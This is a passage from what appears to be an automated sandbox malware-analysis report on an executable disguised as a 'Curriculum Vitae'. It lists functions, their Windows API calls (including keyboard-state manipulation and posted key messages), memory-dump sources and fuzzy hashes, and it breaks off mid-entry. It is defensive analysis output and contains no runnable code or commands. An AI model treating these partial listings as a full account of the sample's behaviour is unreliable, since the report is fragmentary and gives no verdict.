                      • Instruction ID: 60e4fff26b33fb898199c1e4a38cc3db0291b07b36aca71f3428602cc7521e94
                      • Opcode Fuzzy Hash: 559aab8918db1a8d1967b5bdcbdd4dcd79e76da7a6827c5393fe25db86fb33e6
                      • Instruction Fuzzy Hash: 53419F65C1021865CF11EBB4888A9CFB7A8EF45311F508466FD28E3122EB34E249C7BA
                      Function 00D4F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                      Download Yara Rule
                      APIs
                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00D8682C,00000004,00000000,00000000), ref: 00D4F953
                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00D8682C,00000004,00000000,00000000), ref: 00D8F3D1
                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00D8682C,00000004,00000000,00000000), ref: 00D8F454
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ShowWindow
                      • String ID:
                      • API String ID: 1268545403-0
                      • Opcode ID: 0312176c5a2afc210808b021c9f177f91c020756860f25168c2b746e5fa530ed
                      • Instruction ID: 6f2130531f05e2c223d013fd310506a936fefb442a1780e465b1d1a388dc58da
                      • Opcode Fuzzy Hash: 0312176c5a2afc210808b021c9f177f91c020756860f25168c2b746e5fa530ed
                      • Instruction Fuzzy Hash: 2541E731618781BBD7399F2D8988B2E7B92AB56314F1C543DE1CB96670C632E880CF31
                      Function 00DC2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                      Download Yara Rule
                      APIs
                      • DeleteObject.GDI32(00000000), ref: 00DC2D1B
                      • GetDC.USER32(00000000), ref: 00DC2D23
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DC2D2E
                      • ReleaseDC.USER32(00000000,00000000), ref: 00DC2D3A
                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00DC2D76
                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00DC2D87
                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00DC5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00DC2DC2
                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00DC2DE1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                      • String ID:
                      • API String ID: 3864802216-0
                      • Opcode ID: ce63ad3825d661947608d6d6f419a9b122d0504287779092881dad52c5a7edf1
                      • Instruction ID: 6440effd51df68d4dbb20c3cd2c1301d47c779c50bcf08062220171edd7e5a2e
                      • Opcode Fuzzy Hash: ce63ad3825d661947608d6d6f419a9b122d0504287779092881dad52c5a7edf1
                      • Instruction Fuzzy Hash: 48318B72251616BFEB118F508C8AFFB3BA9EB19711F084055FE09DA2A1C6759C41CBB0
                      Function 00D95622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _memcmp
                      • String ID:
                      • API String ID: 2931989736-0
                      • Opcode ID: e7f17736b3febf10bb52680d48643cc905374d7f0775f54b8020b067ac7b1a8d
                      • Instruction ID: db4bf26777f033ff7fbd60bd084da2ad834ce43115582a740f106424eb10e88b
                      • Opcode Fuzzy Hash: e7f17736b3febf10bb52680d48643cc905374d7f0775f54b8020b067ac7b1a8d
                      • Instruction Fuzzy Hash: 66219565741A0A7BAF165A20AED2FFA235DEF21385F480034FD059B585F720EE1887B5
                      Function 00DB4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID: NULL Pointer assignment$Not an Object type
                      • API String ID: 0-572801152
                      • Opcode ID: 7b327eef6d7a2c48125ef2ae748f62a753d637c68da7f2fd831112316c0f5995
                      • Instruction ID: 21d5551f999e9a91bc606bb436af42a39af3da9cfa338886618ca6fb0a5ed09a
                      • Opcode Fuzzy Hash: 7b327eef6d7a2c48125ef2ae748f62a753d637c68da7f2fd831112316c0f5995
                      • Instruction Fuzzy Hash: D4D19D71A0060ADFDF10DF98E880BEEB7B5BF48344F188069E916AB285D771D945CBA0
                      Function 00D71522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                      Download Yara Rule
                      APIs
                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00D717FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00D715CE
                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00D717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00D71651
                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00D717FB,?,00D717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00D716E4
                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00D717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00D716FB
                        • Part of subcall function 00D63820: RtlAllocateHeap.NTDLL(00000000,?,00E01444,?,00D4FDF5,?,?,00D3A976,00000010,00E01440,00D313FC,?,00D313C6,?,00D31129), ref: 00D63852
                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00D717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00D71777
                      • __freea.LIBCMT ref: 00D717A2
                      • __freea.LIBCMT ref: 00D717AE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                      • String ID:
                      • API String ID: 2829977744-0
                      • Opcode ID: 0bb8b2d31210733653e93ffa84a5d6b271b377200f7e5438516ccb1ae85c38fc
                      • Instruction ID: b16694fff2e9fff0961688cc671aa91ba83f7d2a025b31549d61e7b5736bbc8e
                      • Opcode Fuzzy Hash: 0bb8b2d31210733653e93ffa84a5d6b271b377200f7e5438516ccb1ae85c38fc
                      • Instruction Fuzzy Hash: 2E91A379E002169ADB288E6CC881AEE7BB5EF49710F1C8759E909E7141F725DD44CBB0
                      Function 00DB4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Variant$ClearInit
                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                      • API String ID: 2610073882-625585964
                      • Opcode ID: a85a05e3fd0e38806b2c9696cde38ba61b9be02177a9b700dac55a009792e538
                      • Instruction ID: 46b8c1149e7af74057d8b12fd4165ccf274ea315f96366cf20100eb296b273d5
                      • Opcode Fuzzy Hash: a85a05e3fd0e38806b2c9696cde38ba61b9be02177a9b700dac55a009792e538
                      • Instruction Fuzzy Hash: DD916E71A00219EBDF24CFA5C844FEEBBB8EF46714F148559F506AB282DB709945CBB0
                      Function 00DA1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                      Download Yara Rule
                      APIs
                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00DA125C
                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00DA1284
                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00DA12A8
                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DA12D8
                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DA135F
                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DA13C4
                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DA1430
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                      • String ID:
                      • API String ID: 2550207440-0
                      • Opcode ID: 0bf094df49ae72b27f592e151ac8cb12e9f46d57edc84b7925311c3eb3582501
                      • Instruction ID: 8d3f8f876095fc3d509c7cf768c588a4ca23b8459f98dd79fa18a3703a921524
                      • Opcode Fuzzy Hash: 0bf094df49ae72b27f592e151ac8cb12e9f46d57edc84b7925311c3eb3582501
                      • Instruction Fuzzy Hash: 1791147AA00209AFDB00DF98C885BBEB7B5FF46321F144429E941EB291D774E945CBB4
                      Function 00D4948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ObjectSelect$BeginCreatePath
                      • String ID:
                      • API String ID: 3225163088-0
                      • Opcode ID: a7acda191df04a2cd67a62171f7ba28d1e35b230cb842afde83ea4bec8c7d754
                      • Instruction ID: 87f205a2a9cca5a87ee33333b4a0d9fe3d8fce9130a7312f96dee046d7a667d3
                      • Opcode Fuzzy Hash: a7acda191df04a2cd67a62171f7ba28d1e35b230cb842afde83ea4bec8c7d754
                      • Instruction Fuzzy Hash: D4910571D0021AAFCB10CFAAC894AEEBBB8FF49320F248559E515B7251D774A942DB70
                      Function 00DB3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                      Download Yara Rule
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 00DB396B
                      • CharUpperBuffW.USER32(?,?), ref: 00DB3A7A
                      • _wcslen.LIBCMT ref: 00DB3A8A
                      • VariantClear.OLEAUT32(?), ref: 00DB3C1F
                        • Part of subcall function 00DA0CDF: VariantInit.OLEAUT32(00000000), ref: 00DA0D1F
                        • Part of subcall function 00DA0CDF: VariantCopy.OLEAUT32(?,?), ref: 00DA0D28
                        • Part of subcall function 00DA0CDF: VariantClear.OLEAUT32(?), ref: 00DA0D34
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                      • API String ID: 4137639002-1221869570
                      • Opcode ID: 8ba7ce52b4748f32230a45077a56223a989359964a7983a5d28780c2c29ea1b7
                      • Instruction ID: d76eec7e6f4eb676c0309a912472a7787b966555b3513cd447b4be4bcdb3d7b4
                      • Opcode Fuzzy Hash: 8ba7ce52b4748f32230a45077a56223a989359964a7983a5d28780c2c29ea1b7
                      • Instruction Fuzzy Hash: 479134756083059FCB04DF28C4809AAB7E4FF89314F14892DF88A9B351DB30EE45CBA2
                      Function 00DB4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D9000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D8FF41,80070057,?,?,?,00D9035E), ref: 00D9002B
                        • Part of subcall function 00D9000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D8FF41,80070057,?,?), ref: 00D90046
                        • Part of subcall function 00D9000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D8FF41,80070057,?,?), ref: 00D90054
                        • Part of subcall function 00D9000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D8FF41,80070057,?), ref: 00D90064
                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00DB4C51
                      • _wcslen.LIBCMT ref: 00DB4D59
                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00DB4DCF
                      • CoTaskMemFree.OLE32(?), ref: 00DB4DDA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                      • String ID: NULL Pointer assignment
                      • API String ID: 614568839-2785691316
                      • Opcode ID: c2538f1a42b30becf3946378413b7ea57e308ea92ad1f1c748812873bc26147d
                      • Instruction ID: 32ecde7e45dceb22f847bde45d837587cbcb1c8ebceb8719d540249eed2d0d5a
                      • Opcode Fuzzy Hash: c2538f1a42b30becf3946378413b7ea57e308ea92ad1f1c748812873bc26147d
                      • Instruction Fuzzy Hash: D091F571D00219EFDF14DFA4D891AEEBBB9FF08310F108169E95AA7251DB709A448FB0
                      Function 00DC20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetMenu.USER32(?), ref: 00DC2183
                      • GetMenuItemCount.USER32(00000000), ref: 00DC21B5
                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00DC21DD
                      • _wcslen.LIBCMT ref: 00DC2213
                      • GetMenuItemID.USER32(?,?), ref: 00DC224D
                      • GetSubMenu.USER32(?,?), ref: 00DC225B
                        • Part of subcall function 00D93A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D93A57
                        • Part of subcall function 00D93A3D: GetCurrentThreadId.KERNEL32 ref: 00D93A5E
                        • Part of subcall function 00D93A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00D925B3), ref: 00D93A65
                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00DC22E3
                        • Part of subcall function 00D9E97B: Sleep.KERNEL32 ref: 00D9E9F3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                      • String ID:
                      • API String ID: 4196846111-0
                      • Opcode ID: 0c0b3cca8cff6f94848270413705984c3d32d5ca863f8ff2994221accdb33cac
                      • Instruction ID: ea55337cdd14ba385c5a2cebddbb70b654d237e7cddfa47413103bec513a7422
                      • Opcode Fuzzy Hash: 0c0b3cca8cff6f94848270413705984c3d32d5ca863f8ff2994221accdb33cac
                      • Instruction Fuzzy Hash: F5712C75A00216AFCB14EF64C845EBEB7B5EF88310F148459E956EB351D734E9418FB0
                      Function 00D9AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetParent.USER32(?), ref: 00D9AEF9
                      • GetKeyboardState.USER32(?), ref: 00D9AF0E
                      • SetKeyboardState.USER32(?), ref: 00D9AF6F
                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00D9AF9D
                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00D9AFBC
                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00D9AFFD
                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00D9B020
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessagePost$KeyboardState$Parent
                      • String ID:
                      • API String ID: 87235514-0
                      • Opcode ID: 9f2618fc49e6bcc43c505e00d6eaeb1d91342177fd006ab66127347a61dd9313
                      • Instruction ID: e49774ee50903b6bd7bb998bb12fcf5f38150b5fca5a9bc6d730a841f936aa26
                      • Opcode Fuzzy Hash: 9f2618fc49e6bcc43c505e00d6eaeb1d91342177fd006ab66127347a61dd9313
                      • Instruction Fuzzy Hash: 8051C3A16047D63DFF3646388D45BBA7EA99F06314F0C858AF1D9854D2C398ACC4D7B1
                      Function 00D9ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetParent.USER32(00000000), ref: 00D9AD19
                      • GetKeyboardState.USER32(?), ref: 00D9AD2E
                      • SetKeyboardState.USER32(?), ref: 00D9AD8F
                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00D9ADBB
                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00D9ADD8
                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00D9AE17
                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00D9AE38
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessagePost$KeyboardState$Parent
                      • String ID:
                      • API String ID: 87235514-0
                      • Opcode ID: 52f57f58e2c538557d49dfdfda1ce1dfe302113adce9487034acbe680b490735
                      • Instruction ID: 55204440975d91296a0238974228057ff08ddeca6817bb9ef46d3ace7b742a07
                      • Opcode Fuzzy Hash: 52f57f58e2c538557d49dfdfda1ce1dfe302113adce9487034acbe680b490735
                      • Instruction Fuzzy Hash: 0351C6A26447E53DFF3683388C55B7A7E999B46300F0C8589F1D5468C2D694EC84D7B2
                      Function 00D6542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetConsoleCP.KERNEL32(00D73CD6,?,?,?,?,?,?,?,?,00D65BA3,?,?,00D73CD6,?,?), ref: 00D65470
                      • __fassign.LIBCMT ref: 00D654EB
                      • __fassign.LIBCMT ref: 00D65506
                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00D73CD6,00000005,00000000,00000000), ref: 00D6552C
                      • WriteFile.KERNEL32(?,00D73CD6,00000000,00D65BA3,00000000,?,?,?,?,?,?,?,?,?,00D65BA3,?), ref: 00D6554B
                      • WriteFile.KERNEL32(?,?,00000001,00D65BA3,00000000,?,?,?,?,?,?,?,?,?,00D65BA3,?), ref: 00D65584
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                      • String ID:
                      • API String ID: 1324828854-0
                      • Opcode ID: c166e3aab6f7ad0bf8692793011f9ce4acb3fde5ef79b763272b8ebec3d76c93
                      • Instruction ID: f4e3c72398a8fbd7c4b6ba184ce9adc92de1ab3229f97e1f0aec627d1cba315e
                      • Opcode Fuzzy Hash: c166e3aab6f7ad0bf8692793011f9ce4acb3fde5ef79b763272b8ebec3d76c93
                      • Instruction Fuzzy Hash: 4F518371A0074A9FDB10CFA8E845AEEBBF9EF09300F14455AE556E7295D7309A81CB70
                      Function 00D52D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                      Download Yara Rule
                      APIs
                      • _ValidateLocalCookies.LIBCMT ref: 00D52D4B
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00D52D53
                      • _ValidateLocalCookies.LIBCMT ref: 00D52DE1
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00D52E0C
                      • _ValidateLocalCookies.LIBCMT ref: 00D52E61
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
